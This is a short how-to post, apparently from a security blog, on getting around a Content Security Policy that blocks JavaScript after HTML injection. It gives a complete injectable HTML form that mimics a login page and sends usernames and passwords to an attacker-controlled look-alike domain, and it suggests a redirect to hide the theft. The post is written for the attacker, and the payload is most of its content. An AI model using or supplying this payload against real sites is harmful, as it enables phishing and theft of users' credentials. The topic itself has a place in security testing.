Bypassing CSP XSS Protection

Last Modified: Thu, 20 May 2021 16:17:41 +0000 ; Created: Thu, 20 May 2021 16:17:41 +0000

Ever have a vulnerable web application where you can inject HTML tags but the Content Security Policy (CSP) prevents your JavaScript from running? Sometimes you can work around the CSP but other times it is very well defined and blocks any malicious code.

Bypass Solution

Since you can get HTML tags injected consider using an HTML form with CSS styling to impersonate the login page. The trick is to not use any JavaScript but point the form submission action to a malicious server you host for capturing login submissions. You could even then redirect back after that to make it look like the login was successful.

<div style="height: 100%">
<form method="POST" action="https://my.look-alike-domain.example.com/login.cgi">
	<label>Username:</label>
	<input type="text" name="username" /><br />
	<label>Password:</label>
	<input type="password" name="password" /><br />
	<input type="submit" />
</form>
</div>